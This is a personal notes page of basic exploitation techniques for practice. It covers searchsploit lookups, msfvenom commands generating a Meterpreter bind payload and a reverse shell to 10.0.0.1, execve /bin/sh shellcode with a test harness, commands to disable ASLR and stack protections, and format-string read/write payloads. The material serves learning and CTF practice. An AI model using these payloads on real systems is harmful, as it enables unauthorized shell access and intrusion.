|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 13.09.2019

basic exploitation


Here I collect some notes on finding publicly available exploits and on creating or modifying your own simple exploits.

exploitation

The site io.netgarage.org offers a good start for practice.

windows mitigation timeline


The following table shows some exploit mitigations and the Windows versions introducing it.

XP SP2 Vista Windows 7 Windows 8 Windows 10
DEP ASLR EMET GuardPages CFG
SafeSEH LFH
SafeUnlink SEHOP
Canaries

find publicly available exploits


online exploit ressources

www.exploit-db.com/search/
google: <search_string> exploit site:securityfocus.com inurl:bid

exploit-db (offline)

searchsploit <search_string>
grep <search_string> /usr/share/exploitdb/files.csv

compilation


show local libc version

$(ldd $(which ls) | grep libc.so | cut -d " " -f3) | head -n1

compile for 32bit target

apt install gcc-multilib
gcc -m32 exploit.c -o exploit

compile for windows target

/home/user/.wine/drive_c/MinGW/bin/gcc.exe exploit.c -o exploit.exe

Another way to setup the cross-compile environment is to install veil-evasion.

meterpreter binary

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1337 -f exe -o meterpreter.exe

disable ALSR, PIE, NX, Canaries, RELRO and compiler optimization

To practice or analyze simple exploits it can help to deactivate some mitigations. In linux this can be done with the following commands.

echo 0 > /proc/sys/kernel/randomize_va_space
gcc -o test test.c -no-pie -zexecstack -fno-stack-protector -znorelro -O0

shellcode generation


A good resource for already assembled shellcode is shell-storm.org.

Infos on opcodes and linux syscalls can be found on sparksandflames.com, github.com/corkami and syscalls.kernelgrok.com.

shell.s

BITS 32
xor    eax,eax
push   eax
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
push   eax
push   ebx
mov    ecx,esp
mov    al,0xb
int    0x80

Assemble the file and print the opcode string

nasm shell.s -o shell
xxd -p shell

radare2

With radare2 you can do this in one step

rasm2 -a x86 -b 32 "xor eax,eax; xor edx,edx; push eax; push 0x68732f2f; push 0x6e69622f; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov al,0xb; int 0x80"

metasploit

Alternatively you can generate shellcode with metasploit

msfvenom -l payloads
msfvenom -p linux/x86/shell_reverse_tcp --list-options
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 -b "\x00\x0a" -f c

To test the generated shellcode you can use the following program

shellcode_test.c

#include <stdlib.h>

char sc[] = "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

void main(){
    void (*f)(void);
    f = (void *)sc;
    f();
}

compile the above with

gcc -m32 -z execstack -o shellcode_test shellcode_test.c

determine buffer length


metasploit

/usr/share/metasploit-framework/tools/pattern_create.rb 300
/usr/share/metasploit-framework/tools/pattern_offset.rb 0x396a4138

peda

gdb-peda$ pattern_create 300
gdb-peda$ pattern_offset 0x41416d41

format string exploits


In 64bit linux the arguments are passed in RDI RSI RDX RCX R8 R9. Additional arguments are passed on the stack. Depending on the format string vulnerability the content of these registers and the stack can be read.

read data

%6$p
affeaffeaffeaffe%6$s

write data

%199x...affeaffeaffeaffe$7$hhn

find trampolines


metasploit

/usr/share/metasploit-framework/tools/nasm_shell.rb
nasm > jmp eax
00000000  FFE0              jmp eax

objdump -D <binary> | grep "ff  e0"

peda

gdb-peda$ jmpcall esp libc

find strings in binary


gdb

gdb$ br __libc_start_main
gdb$ run
gdb$ info sharedlibrary
gdb$ find &system,+9999999,"/bin/sh"

peda

gdb-peda$ br __libc_start_main
gdb-peda$ run
gdb-peda$ searchmem "/bin/sh" libc